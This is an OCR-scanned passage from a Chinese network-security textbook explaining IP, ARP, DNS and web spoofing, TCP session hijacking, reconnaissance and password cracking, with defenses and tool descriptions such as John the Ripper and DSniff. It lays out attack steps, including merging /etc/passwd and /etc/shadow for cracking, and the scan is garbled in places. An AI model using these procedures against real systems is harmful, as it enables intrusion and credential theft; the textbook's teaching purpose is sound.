服务 器 与 可 信服 务 器 之 间 的 往返 时 间 (RTT)。RTT 一 般 是 通过 多 次 统计 平均 计算 出 来 
的 。 在 没有 连接 的 情况 下 ,TCP 序列 号 为 128 000 * RTT; 如 果 目 标 服务 器 刚刚 建立 过 一 个 
连接 ,就 还 要 加 上 64 000。 

上 述 分 析 是 一 种 理论 上 的 分 析 。 黑 客 通常 的 做 法 是 通过 对 目标 主机 的 合法 连接 ,获得 
目标 主机 发 送 IP 数据 包 的 序列 记录 。 具 体 步骤 为 : 

@ 请 求 连接 目标 主机 ; 

@ 目标 主机 送 回 带 序列 号 的 回应 ; 

@ 记录 序列 号 并 断 开 连 接 。 

在 一 般 情况 下 ,通过 对 所 记录 的 序列 号 的 分 析 , 可 以 猜测 出 认证 要 求 序列 号 的 规则 。 

(4) 冒充 受信 主机 连接 到 目标 主机 。 
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(5) 根据 猜 出 的 序列 号 ,向 目标 主机 发 送 回应 卫 包 。 
(6) 进行 系列 会 话 。 


2. IP 欺骗 的 防范 


IP 欺骗 攻击 比较 普遍 ,而 且 产 生 的 危害 性 很 大 。 下 面 是 IP 欺骗 的 一 些 预防 策略 。 

(1) 放弃 基于 IP 地 址 的 信任 策略 : IP 欺骗 是 基于 IP 地 址 信任 的 。 而 IP 地 址 很 容易 
伪造 。 因 此 ,阻止 这 类 攻击 的 一 种 非常 简单 的 方法 是 放弃 以 IP 地 址 为 基础 的 验证 。 

(2) 使 用 随机 化 的 初始 序列 号 : 序列 号 是 接收 方 TCP 进行 合法 检查 的 一 个 重要 依据 。 
黑客 攻击 能 够 得 退 的 一 个 重要 因素 就 是 ,序列 号 有 一 定 的 选择 和 增加 规律 。 堵 塞 这 一 漏洞 
的 方法 就 是 让 黑客 无 法 计算 或 猜测 出 序列 号 。Bellovin 提出 了 一 个 公式 : 

ISN = M+F(localhost, localport, remotehost, remoteport) 
其 中 ,M 为 4 微 秒 定时 器 ,下 为 加 密 Hash 函数 ,localhost 为 本 地 主机 ,localport 为 本 地 端 
口 ,remotehost 为 远方 主机 ,remoteport 为 远方 端口 。Bellovin 建议 下 是 一 个 结合 连接 标识 
符 和 特殊 矢量 (随机 数 ,基于 启动 试卷 的 密码 ) 的 Hash 函数 , 它 产生 的 序列 号 不 能 通过 计算 
或 猜测 出 。 

(3) 在 路 由 器 中 加 上 一 些 附加 条 件 。 这 些 条 件 包 括 : 不 允许 声称 是 内 部 包 的 外 部 包 
〈 源 地 址 和 目标 地 址 都 是 本 地 域 地 址 ) 进 入 ,以 防止 外 部 攻击 者 假冒 内 部 主机 的 IP 欺骗 ; 禁 
止 带 有 内 部 资源 地 址 的 内 部 包 出 去 ,以 防止 内 部 用 户 对 外 部 站 点 的 攻击 。 

(4) 配置 服务 器 ,降低 IP 欺骗 的 可 能 : 分 析 自 己 的 服务 器 ,看 哪些 服务 容易 遭受 IP 欺 
骗 攻 击 ,并 考虑 这 些 服务 有 无 保留 的 必要 。 

(5) 使 用 防火 墙 和 其 他 抗 IP 欺骗 的 产品 。 


4.5.2 TCP 会 话 支持 


1. TCP 会 话 支持 及 其 攻击 方法 


会 话 劫持 (session hijack) 与 IP 欺骗 有 点 相似 , 它 是 基于 网 络 通信 中 的 如 下 规律 进 
行 的 。 

(1) 以 太 网 使 用 广播 方式 进行 通信 ,在 同一 网 段 中 ,每 一 台 监 听 设 备 都 可 以 接收 到 其 他 
站 点 发 送 的 分 组 。 

(2) 在 以 太 网 中 ,主机 之 间 进 行 通信 ,并 不 检测 MAC 地 址 ,因此 主机 不 能 发 现 连 接 中 
的 MAC 地 址 改变 。 

(3) 在 TCP 连接 中 ,只 是 刚 开 始 连 接 时 进行 一 次 IP 地 址 的 验证 ,在 连接 过 程 中 TCP 
应 用 程序 只 跟踪 序列 号 ,而 不 进行 IP 地 址 验证 。 因 此 ,一旦 同一 网 段 上 的 入 侵 者 获悉 目标 
机 的 序列 号 规律 ,就 可 以 假冒 该 目标 主机 的 受信 机 与 该 目标 主机 进行 通信 ,把 原来 目标 主 
机 与 其 受信 机 之 间 的 会 话 劫持 过 去 。 

假设 A、B、C 是 一 个 网 段 上 的 3 台 主 机 ,其 中 ,B 是 一 台 被 入 侵 者 控制 了 的 主机 ,A、C 是 
两 台 正 在 会 话 的 主机 。 由 于 3 台 主 机 在 一 个 (以 太 ) 网 段 上 ,所 以 B 能 收 到 A 与 C 的 所 有 数 
据 包 。 
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如 果 当 A 正 等 待 C 的 数据 包 时 ,B 抢 先 给 A 一 个 伪造 的 数据 包 ,A 就 会 对 这 个 数据 包 
进行 回应 ,B 也 再 次 响应 。 当 C 的 真正 的 数据 包 传送 到 A 时 ,由 于 A 所 期 待 的 序列 号 已 经 
变化 而 不 再 认识 C 的 数据 包 , 并 将 之 丢弃 ,继续 同 B( 冒 充 A) 会 话 。 

C 无 法 与 A 进行 会 话 , 却 不 知道 问题 所 在 ,会 误 认为 是 网 络 一 时 的 故障 。 于 是 不 停 地 
向 A 发 送 ACK 数据 报 文 ,试图 重 传 。 而 A 却 不 断 地 将 这 些 数 据 报 文 丢弃 。 这 样 不 停 地 重 
复工 作 ,就 会 产生 ACK“ 风 暴 ”。 


2. 会 话 劫持 攻击 工具 


(1) Juggernaut 

Juggernaut 是 由 Mike Schiffman 开发 的 一 个 可 以 用 来 进行 TCP 会 话 攻击 的 网 络 snif- 
fer 的 开放 的 自由 软件 。 可 以 运行 在 Linux 操作 系统 的 终端 机 上 ,安装 和 运行 都 很 简单 。 可 
以 设置 值 上 暗号 或 标志 这 3 种 不 同 的 方式 来 通知 Juggernaut 程序 是 否 对 所 有 的 网 络 流量 进 
行 观察 ,例如 ,一 个 典型 的 标记 就 是 登录 暗号。 无 论 何 时 Juggernaut 发 现 这 个 暗号 ,就 会 捕 
获 会 话 , 这 意味 着 黑客 可 以 利用 捕获 到 的 用 户 密码 再 次 进入 系统 。 

(2) Hunt 

Hunt 是 Kra 开发 的 一 个 用 来 听取 、 截 取 和 劫持 网 络 上 的 活动 会 话 的 程序 。 

(3) TTY Watcher 

TTY Watcher 是 一 个 免费 的 程序 ,允许 人 们 监视 并 且 劫 持 一 台 单 一 主机 上 的 连接 。 

(4) IP Watcher 

IP Watcher 是 一 个 商用 的 会 话 支持 工具 , 它 允 许 监视 会 话 并 且 获 得 积极 的 反 会 话 支持 
方法 。IP Watcher 基于 TTY Watcher 还 提供 一 些 额 外 的 功能 ,如 可 以 监视 整个 网 络 。 


4.5.3 ARP 欺骗 


1. ARP 欺骗 原理 


ARP(address resolution protocol, 地 址 解析 协议 ) 是 一 种 将 32 位 IP 地 址 转化 成 48 位 
MAC 地 址 的 协议 。 其 工作 过 程 是 : 当 某 台 主机 要 发 送 或 转发 来 自 网 络 层 的 数据 时 ,首先 要 
广播 一 个 ARP 请 求 , 询 问 哪 台 主 机 拥有 这 个 IP 地 址 。 而 该 IP 地 址 的 拥有 者 则 用 含有 该 
IP 地 址 和 相应 MAC 地 址 的 帧 进行 应 答 。 这 样 ,发 送 者 就 会 将 之 存 人 自己 的 高 速 缓存 ,并 根 
据 这 种 对 应 关系 发 送 数据 。 但 是 ,ARP 的 特点 是 无 状态 , 即 在 没有 请 求 时 也 可 以 发 送 应 答 
的 包 。 入 侵 者 可 以 利用 这 一 点 ,向 网 络 上 发 送 自己 定制 的 包 , 包 中 包括 源 IP 地 址 .目的 IP 
地 址 以 及 硬件 地 址 ,不 过 它们 都 是 伪造 的 。 这 些 伪造 的 数据 会 修改 网 络 上 主机 中 的 ARP 
高 速 缓存 。 

例如 ,网 络 上 有 3 台 主 机 ,有 如 下 的 信息 : 


主机 名 ”IP 地 址 硬件 地 址 
A 201.15.192.01 AA: AA 
B 201.15;, 192:02” BB:; BB 
C 201. 15. 192.:08. CCCC 
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这 3 台 主 机 中 ,B 是 一 台 被 入 侵 者 控制 了 的 主机 , 它 具有 root 权限 ,而 A 信任 C。 人 入侵 
者 的 目的 就 是 伪装 成 C 获得 A 的 信任 ,以 便 获 得 一 些 无 法 直接 获得 的 信息 等 。 下 面 介绍 人 
侵 者 利用 B 进行 ARP 欺骗 的 过 程 。 通常 ,入 侵 者 要 使 用 一 些 ARP 欺骗 的 工具 ,如 send 
_arp。 

(1) 入 侵 者 控制 主机 也 向 主机 A 发 送 一 个 ARP 应 答 ,ARP 应 答 中 包括 : 源 IP 地 址 
(201. 15. 192. 03) 、 源 硬件 地 址 (BB: BB)、 目 标 IP 地 址 (201. 15. 192. 01) .目标 硬件 地 址 
(AA: AA Y; 

这 条 应 答 被 A 接受 后 ,就 被 保存 到 A 主机 的 ARP 高 速 缓存 中 了 。 

但 是 ,由 于 网 络 上 C 主机 也 是 活动 的 ,也 有 可 能 向 A 发 出 自己 的 ARP 应 答 ,将 A 的 
ARP 缓存 改 回 正确 的 硬件 地 址 。 因 此 ,B 在 进行 ARP 欺骗 时 还 必须 使 C 不 能 向 A 发 送 
ARP 应 答 。 入 侵 者 的 办 法 是 也 向 C 发 ARP 应 答 , 将 A 的 硬件 地 址 改 为 一 个 虚假 的 地 址 
(不 存在 的 硬件 地 址 ) ,如 DD: DD, 使 得 C 发 向 A 的 ARP 应 答 根本 无 法 收 到 。 

(2) A 根据 ARP 缓存 中 的 缓存 记录 ,将 发 往 C(201. 15. 192. 03,CC: CC) 的 数据 报 文 ， 
发 向 了 B(201. 15. 192. 02,BB: BB) ,图 4. 11 为 这 个 过 程 的 示意 图 。 


B( 入 侵 者 ) 


@ 201.15.192.03 是 BB:BB @ 201.15.192.01 是 DD:DD 


A C 
201.15.192.01 201.15.192.03 
AA:AA @ 发 送 数据 报 文 CC:CC 


图 4.11 ARP 欺骗 过 程 示意 图 


201.15.192.02 
BB:BB 


2. ARP 欺骗 的 防范 


(1) MAC 地 址 绑 定 ,使 网 络 中 每 一 台 计 算 机 的 IP 地 址 与 硬件 地 址 一 一 对 应 , 且 不 可 
更 改 。 

(2) 使 用 静态 ARP 缓存 ,用 手工 方法 更 新 缓存 中 的 记录 ,使 ARP 欺骗 无 法 进行 。 

(3) 使 用 ARP 服务 器 ,使 其 他 计算 机 的 ARP 配置 只 接受 来 自 ARP 服务 器 的 ARP 
响应 。 


4.5.4 DNS 欺骗 


1. DNS 工作 原理 


DNS(domain name system, 域 名 系统 ) 是 一 种 用 于 TCP/IP 应 用 程序 的 分 布 式 数据 库 ， 
它 提供 主机 名 字 和 IP 地 址 之 间 的 转换 以 及 有 关 电 子 邮 件 的 选 路 信息 。 
设 有 如 图 4.12 所 示 的 3 台 主 机 。 其 中 ,B 向 A 提供 DNS 服务 ,A 想 要 访问 C(www. 
ccc. com) 。 这 个 过 程 如 下 : 
(1) A 向 B 发 一 个 DNS 查询 请 求 ,要 求 B 告诉 www. ccc. com 的 IP 地 址 ,以 便 与 之 
通信 。 
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B(DNS 服务 器 ) 其 他 DNS 服务 器 


@ 请 求 wwwececom “门口 @ 向 其 他 DNS 请 求 


的 全 地 址 图 结果 (201.15.192.03) 
SE Siam 
人 < 一 结果 ( 201.15.192.03) _5 


一 
回 向 C 发 出 连接 请 求 
201.15.192.01 www.ccc.com (201.15.192.03) 


图 4.12 DNS 工作 过 程 示意 图 


(2) B 查询 自己 的 DNS 数据 库 , 找 不 到 www. ccc. com 的 IP 地 址 ,就 向 其 他 DNS 服务 
器 求援 , 逐 级 递交 DNS 请 求 。 

(3) 某 个 DNS 服务 器 查 到 了 www. ccc. com 的 IP 地址 ,向 B 返回 结 果 。B 将 这 个 结果 
保存 在 自己 的 缓存 中 。 

(4) 也 将 结果 告诉 A。 

(5) A 得 到 了 C 的 地 址 ,就 可 以 访问 C 了 (如 向 C 发 出 连接 请 求 ) 。 

在 上 述 过 程 中 ,如 果 B 在 一 定 的 时 间 内 不 能 给 A 返回 要 查找 的 IP 地 址 ,就 会 给 A 返回 
“主机 名 不 存在 ”的 错误 信息 。 


2. DNS 欺骗 原理 和 过 程 


DNS 有 两 个 重要 特性 : 

。 DNS 对 于 自己 无 法 解析 的 域名 ,会 自动 向 其 他 DNS 服务 器 查询 。 

。 为 提高 效率 ,DNS 会 将 所 有 已 经 查询 到 的 结果 存 人 缓存 (cache) 。 

正 是 这 两 个 特点 ,使 得 DNS 欺骗 (DNS spoofing) 成 为 可 能 。 

实施 DNS 欺骗 的 基本 思路 是 : 让 DNS 服务 器 的 缓存 中 存 有 错误 的 IP 地址, 即 在 DNS 
缓存 中 放 一 个 伪造 的 缓存 记录 。 为 此 ,攻击 者 要 做 两 件 事 : 

。 先 伪 造 一 个 用 户 的 DNS 请 求 。 

。 再 伪造 一 个 查询 应 答 。 

但 是 ,在 DNS 的 消息 格式 中 还 有 一 个 16 位 的 查询 标识 符 (Query ID) , 它 将 被 复制 到 
DNS 服务 器 的 相应 应 答 中 ,在 多 个 查询 未 完成 时 ,用 于 区 分 响应 。 所 以 ,回答 信息 只 有 
Query ID 和 IP 都 吻合 才能 被 DNS 服务 器 接受 。 因 此 ,进行 DNS 欺骗 攻击 ,还 需要 能 够 精 
确 地 猜测 出 Query ID。 由 于 Query ID 每 次 加 1, 只 要 通过 第 一 次 向 将 要 欺骗 的 DNS 服务 
器 发 一 个 查询 包 并 监听 其 Query ID 值 ,随后 再 发 送 设 计 好 的 应 答 包 , 包 内 的 Query ID 就 是 
要 预测 的 Query ID。 

下 面 结合 图 4. 11 ,介绍 DNS 欺骗 过 程 。 

(1) 入 侵 者 先 向 BCDNS 服务 器 ) 提 交 查 询 www. ccc. com 的 IP 地 址 的 请 求 。 

(2) B 向 外 递交 查询 请 求 。 

(3) 入 侵 者 立即 伪造 一 个 应 答 包 ,告诉 www. ccc. com 的 IP 地 址 是 201. 15. 192. 04( 往 
往 是 入 侵 者 的 IP 地址 )。 

(4) 查询 应 答 被 B(DNS 服务 器 ) 记 录 到 缓存 中 。 

= 159 3% 


(5) 当 A 向 了 提交 查询 www. ccc. com 的 IP 地 址 请 求 时 ,B 将 201.15.192.04 告 诉 A。 
3. DNS 欺骗 的 局 限 性 


DNS 欺骗 有 如 下 的 局 限 性 : 
(1) 入 侵 者 不 能 替换 DNS 缓存 中 已 经 存在 的 记录 。 
(2) 缓存 中 的 记录 具有 一 定 的 生存 期 ,过 期 就 会 被 刷新 。 


4.5.5 Web 欺骗 


1. Web 欺骗 举例 


(1) 基本 的 网 站 欺骗 

由 于 目前 注册 一 个 域名 没有 任何 要 求 , 利 用 这 一 点 ,攻击 者 会 抢先 或 特别 设计 注册 一 个 
有 欺骗 性 的 站 点 。 当 用 户 浏览 了 这 个 假冒 地 址 并 与 之 进行 了 一 些 信息 交流 (如 填写 了 一 些 
表单 ) 后 ,站 点 会 给 出 一 些 响应 的 提示 和 回答 ,同时 记录 下 用 户 的 信息 ,并 给 这 个 用 户 一 个 
cookie, 以 便 能 随时 跟踪 这 个 用 户 。 典 型 的 例子 是 假冒 金融 机 构 偷 瓷 客 户 的 信用 卡 信息 。 

(2) URL 重 写 

通过 在 URL 重 写 , 攻 击 者 能 够 把 网 络 流量 转 到 攻击 者 控制 的 一 个 站 点 上 。 具 体 办 法 
是 攻击 者 将 自己 的 Web 地 址 加 在 所 有 URL 地 址 的 前 面 。 这 样 , 当 用 户 与 站 点 进行 安全 链 
接 时 ,就 会 毫 不 防备 地 进入 攻击 者 的 服务 器 ,于 是 用 户 的 所 有 信息 便 处 于 攻击 者 的 监视 
志 提 5 


2，Web 欺骗 的 技巧 


(1) 表单 欺骗 

在 URL 改写 的 基础 上 ,表单 欺骗 将 会 进行 得 非常 自然 。 当 受 攻击 者 提交 表单 后 ,所 提 
交 的 数据 进入 了 攻击 者 的 服务 器 。 攻 击 者 的 服务 器 能 够 观察 ,甚至 修改 所 提交 的 数据 。 同 
样 ,在 得 到 真正 的 服务 器 返回 信息 后 ,攻击 者 在 受 攻 击 者 返回 以 前 也 可 以 为 所 和 欲 为 。 

(2) 设计 攻击 的 导 火 索 

为 了 开始 攻击 ,攻击 者 必须 以 某 种 方式 引诱 受 攻击 者 进入 攻击 者 所 创造 的 错误 的 
Web。 黑 客 往往 使 用 下 面 若干 种 方法 。 

。 把 错误 的 Web 链接 到 一 个 热门 Web 站 点 上 ; 

。 如 果 受 攻击 者 使 用 基于 Web 的 邮件 ,可 以 将 它 指向 错误 的 Web; 

。 创建 错误 的 Web 索引 ,指示 给 搜索 引擎 。 

(3) 完善 攻击 

前 面 描述 的 攻击 相当 有 效 , 但 是 它 还 不 是 十 分 完美 。 黑 客 往往 还 要 创造 一 个 可 信 的 环 
境 , 包 括 各 类 图 标 文字 、 链 接 等 ,提供 给 受 攻击 者 各 种 各 样 的 可 信 的 暗示 ,以 隐藏 一 切 尾巴 。 

(4) 状态 信息 

状态 信息 显示 在 浏览 器 底部 。Web 欺骗 中 涉及 两 类 信息 : 

。 当 鼠 标 放置 在 Web 链接 上 时 ,连接 状态 显示 链接 所 指 的 URL 地 址 ; 
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。 当 Web 连接 成 功 时 ,连接 状态 将 显示 所 连接 的 服务 器 名 称 。 

这 两 项 信息 都 容易 使 攻击 者 露出 尾巴 一 一 URL 或 服务 器 名 称 。 为 此 ,攻击 者 往往 通过 
JavaScript 编程 来 弥补 这 两 项 不 足 。 由 于 JavaScript 能 够 对 连接 状态 进行 写 操作 ,而 且 可 以 
将 JavaScript 操作 与 特定 事件 绑 定 在 一 起 ,所 以 ,攻击 者 完全 可 以 将 改写 的 URL 状态 恢复 
为 改写 前 的 状态 ,这 样 Web 欺骗 将 更 为 可 信 。 


4.6 信息 获取 攻击 


一 般 来 说 ,信息 获取 攻击 是 攻击 者 进行 攻击 的 准备 工作 。 这 些 准 备 包 括 如 下 3 方面 的 
工作 

(1) 踩点 (footprinting): 收集 关于 目标 系统 的 有 关 信息 ,内 容 包 括 : 

。 目标 机 的 类 型 IJP 地址、 所 在 网 络 的 类 型 ; 

。 操作 系统 的 类 型 .版 本 ; 

。 系统 管理 人 员 的 名 字 、 邮 件 地 址 。 

通过 对 被 攻击 对 象 信息 的 分 析 , 可 找到 被 攻击 对 象 的 脆弱 点 。 为 了 获得 这 些 信息 ,攻击 
者 要 利用 一 些 技 术 , 例 如 : 
运行 一 个 host 命令 ,可 以 获得 被 攻击 目标 机 的 IP 地 址 信息 ,还 可 以 识别 出 目标 机 操 
作 系统 的 类 型 ; 
利用 whois 查询 ,可 以 了 解 技术 管理 人 员 的 名 字 ; 
运行 一 些 UserNet 和 Web 查询 ,可 以 了 解 有 关 技术 人 员 是 否 经 常 上 UserNet 等 ; 
利用 DNS 区 域 传送 工具 dig、nslookup 及 Windows 版 本 的 Sam Spade( 网 址 为 ht- 
tp: //www. samspade. org) ,获取 目标 域 中 的 所 有 主机 信息 ; 
一 个 管理 人 员 经 常 讨论 的 问题 也 可 以 表明 其 技术 水 平 的 高 低 等 。 

(2) 扫描 (scanning): 是 在 踩点 获得 信息 的 基础 上 进一步 发 现 漏洞 ,以 获取 目标 系统 的 
可 攻击 点 。 扫 描 包 含 了 非 破坏 性 原则 , 即 不 对 网 络 造成 任何 破坏 。 在 实施 策略 上 可 以 采用 
被 动 式 和 主动 式 两 种 策略 。 

(3) 查 点 (enumeration) : 是 对 攻击 目标 的 进一步 确认 ,提取 和 欲 攻击 对 象 的 有 效 账 号 .用 
户 组 名 、 路 由 表 、SNMP 信息 .共享 资源 .服务 程序 及 旗 标 等 信息 。 

下 面 介 绍 信息 系统 攻击 者 常用 的 一 些 信息 收集 技术 和 工具 。 


4.6.1 口令 攻击 

口令 机 制 是 资源 访问 的 第 一 道 屏障 。 攻 破 了 这 道 屏障 ,就 获得 了 进入 系统 的 第 一 道 大 
门 。 所 以 口令 攻击 是 入侵 者 最 常用 的 攻击 手段 。 口 令 攻击 可 以 从 破解 口令 和 屏蔽 口令 保护 
两 个 方面 进行 。 下 面 主要 介绍 口令 破解 技术 。 

1. 口令 破解 的 基本 技术 

口令 破解 首先 要 获取 口令 文件 ,然后 采取 一 定 的 攻击 技术 进行 口令 的 破解 。 下 面 介 绍 
口令 破解 的 基本 方法 。 


* BE 茎 


(1) 口令 字典 猜测 破解 法 


攻击 者 基于 某 些 知识 ,编写 出 口令 字典 ,然后 对 字典 进 


穷 举 或 猜测 攻击 。 表 4. 2 为 口 


令 字典 的 构造 方法 。 
表 4.2 口令 字典 的 构造 方法 
序号 口令 类 型 实例 序号 口令 类 型 实例 
1 规范 单词 computer 19 医药 词汇 vitamin 
2 反 写 规范 单词 retupmoc 20 技术 词汇 Ruter 
3 词 首 正规 大 写 Computer pA 商品 beer 
4 反 大 写 computeR 22 用 户 标 识 符 woodc 
5 缩写 TCP 23 反 写 用 户 标识 符 cdoow 
6 带 点 缩写 TG 24 “| 串 接 用 户 标识 符 woodc-woodec 
7 缩写 后 带 点 TOBP, 25 “| 截 短 用 户 标识 符 woo 
8 略 写 etc 26 “| 串 接 用 户 标识 符 并 截 短 | woodcwood 
和 专 有 名 词 缩写 , 带 点 Ph. D 27 “| 单字 符 构 成 串 bbbbbb 
10 | 专 有 名 词 缩写 ,不 全 大 写 | kHz 28 “| 键盘 字母 asdfgh 
11 姓 Bush 29 文化 名 人 Beethoven 
12 | 名 Tom 30 “| 年 月 日 040723 
13 所 有 格 Bob’s 3 电话 号 码 5863583 
14 “| 动词 变化 a 32 “| 邮政 编码 214036 
15 复数 books 33 证 件 号 码 20010612345 
16 法 律 用 语 legal 34 门牌 号 码 AB3579 
17 地 名 ( 城 / 街 / 山 / 河 等 ) BeiJing 35 车 牌号 码 苏 -w12345 
18 生物 词汇 Dog 


目前 ,Internet 上 已 经 提供 了 一 些 口 令 字 典 , 从 一 万 条 到 几 十 万 条 ,可 以 下 载 。 此 外 ,还 
有 一 些 可 以 生成 口令 字典 的 程序 。 利 用 口令 字典 可 以 以 猜测 方式 进行 口令 破解 攻击 。 
(2) 穷 举 破解 法 
有 人 认为 使 用 足够 长 的 口令 或 者 使 用 足够 完善 的 加 密 模 式 ,就 会 攻 不 破 。 事 实 上 没有 
攻 不 破 的 口令 ,这 只 是 个 时 间 问 题 。 如 果 有 速度 足够 快 的 计算 机 能 尝试 字母 数字 特殊 字 
符 所 有 的 组 合 ,将 最 终 能 破解 所 有 的 口令 。 这 种 类 型 的 攻击 方式 通过 穷 举 口令 空间 获得 用 
户口 令 称 为 穷 举 破解 法 或 蛮 力 破解 .也 叫 强行 攻击 。 如 先 从 字母 a 开始 ,尝试 aa、ab、ac 等 ， 
然后 尝试 aaa aab .aac… 
(3) 组 合 破解 法 


词典 破解 法 只 能 发 现 词典 单词 口令 
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,但 是 速度 快 。 穷 举 破解 法 能 发 现 所 有 的 口令 


,但 是 


破解 时 间 很 长 。 鉴 于 很 多 管理 员 要 求 用 户 使 用 字母 和 数字 ,用 户 的 对 策 是 在 口令 后 面 添加 
几 个 数字 ,如 把 口令 computer 变 成 computer99。 使 用 强行 破解 法 又 非常 费时 间 。 由 于 实 
际 的 口令 常常 很 弱 ( 可 以 通过 对 字典 或 常用 字符 列表 进行 搜索 或 经 过 简单 置换 而 发 现 口 
令 ), 这 时 可 以 基于 词典 单词 而 在 单词 尾部 串 接 几 个 字母 和 数字 ,这 就 是 组 合 破解 法 。 

(4) 其 他 破解 类 型 

。 社会 工程 学 : 通过 对 目标 系统 的 人 员 进 行 游说 欺骗、 利诱 ,从 而 获得 口令 或 部 分 

口令 。 
*。 偷窥 : 观察 别人 输入 口令 。 
。 搜索 垃圾 箱 。 


2. UNIX 系统 的 口令 攻击 


UNIX 系统 用 户 的 口令 本 来 是 经 加 密 后 保存 在 一 个 文本 文件 passwd 中 ,一 般 存放 在 
/etc 目录 下 。 后 来 由 于 安全 的 需要 ,把 passwd 文件 中 与 用 户口 令 相 关 的 域 提取 出 来 ,组 织 
成 文件 shadow, 并 规定 只 有 超级 用 户 才 能 读 取 。 这 种 分 离 工 作 也 称 为 shadow 变换 。 因 
此 ,在 破解 口令 时 ,需要 作 UnShadow 变换 ,将 /etc/passwd 与 /etc/shadow 合并 起 来 。 在 此 
基础 上 才 开 始 进行 口令 的 破解 。 

真正 的 加 密 口令 一 般 是 很 难 逆向 破解 的 ,黑客 们 常用 的 口令 入 侵 工具 所 采用 的 技术 是 
仿真 对 比 ,利用 与 原 口令 程序 相同 的 方法 ,通过 对 比分 析 , 用 不 同 的 加 密 口令 去 匹配 原 口令 。 
下 面 是 口令 破解 工具 Crack 的 主要 工作 流程 。 

@ 准备 : 对 口令 文件 作 UnShadow 变换 。 

@ 下 载 或 自己 生成 一 个 字典 文件 。 

@ 穷 举 出 口令 字典 中 的 每 个 条 目 ,对 每 个 单词 运用 一 系列 规则 。 典 型 的 规则 有 : 

。 使 用 几 个 单词 或 数字 的 组 合 ， 

。 大 小 写 交 替 使 用 ; 

。 把 单词 正 向 、 反 向 拼写 后 , 接 在 一 起 ， 

。 在 单词 的 开头 或 结尾 加 上 一 些 数字 。 

@ 调用 crypt() 函 数 对 使 用 规则 生成 的 字符 串 进 行 加 密 变换 。 

@ 用 一 组 子 程序 打开 口令 文件 ,取出 密 文 口令 ,与 crypt() 函 数 的 输出 进行 比较 。 

循环 @ 、. 田 两 步 , 直 到 口令 破解 成 功 。 


3. 网 络 服务 口令 攻击 


网 络 服务 口令 攻击 往往 是 一 种 远程 在 线 攻 击 ,攻击 过 程 大 致 如 下 : 
@ 建立 与 目标 网 络 服务 的 网 络 连接 。 
@ 选取 一 个 用 户 列表 文件 和 一 个 字典 文件 。 
@@ 在 用 户 列表 文件 和 一 个 字典 文件 中 ,选取 一 组 用 户 和 口令 ,按照 网 络 服务 协议 规定 ， 
将 用 户 名 和 口令 发 给 目标 网 络 服务 端口 。 
@ 检测 远程 服务 返回 信息 ,确定 口令 尝试 是 否 成 功 。 
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循环 四 、@) .图 步 ,直到 口令 破解 成 功 。 
4. 口令 破解 工具 


(1) Cain & Abel( 穷 人 的 LophtCrack) 

网 址 : http://www. oxid. it/cain. html 

类 别 : 免费 

平台 : Windows 

简介 : Cain & Abel 是 一 个 针对 Microsoft 操作 系统 的 免费 口令 恢复 工具 。 它 通过 如 
下 多 种 方式 轻松 地 实现 口令 恢复 : 网 络 嗅 探 \ 破 解 加 密 口 令 ( 使 用 字典 或 强行 攻击 )、 解 码 被 
打 乱 的 口令 .显示 口令 框 .显示 缓存 口令 和 分 析 路 由 协议 等 。 源 代码 不 公开 。 

(2) DSniff( 一 流 的 网 络 审计 和 渗透 测试 工具 ) 

网 址 : http://naughty. monkey. org/ 一 dugsong/dsniff/ 

类 别 : 开放 源 代码 

平台 : Linux/BSD/UNIX/Windows 

简介 : DSniff 是 由 Dug Song 开发 的 一 套 包 含 多 个 工具 的 软件 套件 。 其 中 ,dsniff file- 
snarf mailsnarf msgsnarf rlsnarf 和 webspy 可 以 用 于 监视 网 络 上 我 们 感 兴 趣 的 数据 (如 口 
令 、E-mail 文件 等 ) ,arpspoof dnsspoof 和 macof 能 很 容易 地 截取 到 攻击 者 通常 难以 获取 的 
网 络 信息 (如 二 层 交 换 数 据 ),sshmitm 和 webmitm 则 能 用 于 实现 重 写 SSH 和 HTTPS 会 
话 ,达到 monkey-in-the-middle 攻击 。 在 http: //www. datanerds. net/ 一 mike/dsniff. html 
可 以 找到 Windows 平台 上 的 移植 版 。 

(3) John the Ripper( 格 外 强大 灵活、 快速 的 多 平台 散 列 口令 破解 器 ) 

网 址 : http://www. openwall. com/john/ 

类 别 : 开放 源 代码 

平台 : Linux/BSD/UNIX/Windows 

简介 : John the Ripper 是 一 个 快速 的 口令 破解 器 ,支持 多 种 操作 系统 ,如 UNIX、DOS、 
Win32、BeOS 和 OpenVMS 等 。 它 设计 的 主要 目的 是 用 于 检查 UNIX 系统 的 弱 口令 ,支持 
几乎 所 有 UNIX 平台 上 经 crypt 函数 加 密 后 的 散 列 口令 类 型 ,也 支持 Kerberos AFS 和 
Windows NT/2000/XP LM 散 列 等 。 

(4) LophtCrack 4(Windows 口令 审计 和 恢复 程序 ) 

网 址 : http://www. atstake. com/research/lc/ 

类 别 : 商业 

平台 : Linux/BSD/UNIX/Windows 

简介 : LophtCrack 试图 根据 从 独立 的 Windows NT/2000 工作 站 、 网 络 服 务 器 、 主 域 控 
制 器 或 Active Directory 上 正当 获取 或 者 从 线路 上 嗅 探 到 的 加 密 散 列 值 里 破解 出 Windows 
口令 ,含有 词典 攻击 组合 攻击 .强行 攻击 等 多 种 口令 猜 解 方法 。 

(5) 网 络 刺 客 

网 络 刺 客 是 一 个 强大 的 网 络 安全 工具 ,扫描 只 是 其 中 的 一 个 功能 。 它 的 扫描 功能 包括 
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共享 扫描 、 端 口 扫 描 ` 口 令 扫 描 猜 测 等 。 
4.6.2 Sniffer 


Sniffer( 嗅 觉 器 ) 是 一 个 用 于 捕获 网 络 报 文 的 软件 ,可 以 用 来 进行 网 络 流量 分 析 , 找 出 网 
络 中 潜在 的 问题 ,确定 在 通信 使 用 的 多 个 协议 中 属于 不 同 协议 的 流量 大 小 , 哪 台 主机 承担 主 
要 协议 的 通信 , 哪 台 主机 是 主要 的 通信 目的 地 , 报 文 发 送 的 时 间 是 多 少 , 主 机 间 报 文 传送 的 
时 间 间 隔 等 。 它 是 网 络 管理 员 的 一 个 常用 工具 。 


1. Sniffer 的 工作 原理 


(1) 在 共享 网 络 中 的 嗅觉 器 

共享 意味 着 一 台 计 算 机 能 够 接收 到 其 他 计算 机 之 间 通 信 的 信息 ,或 者 说 同一 网 段 的 网 
络 所 有 接口 都 有 访问 在 物理 媒体 上 传输 数据 的 能 力 。 以 太 网 的 特点 就 是 这 样 的 一 种 共享 
网 络 。 

图 4. 13 为 网 卡 对 报 文 的 处 理 过 程 。 显 然 , 当 局 域 网 中 的 某 台 计算 机 将 网 络 接口 配置 成 
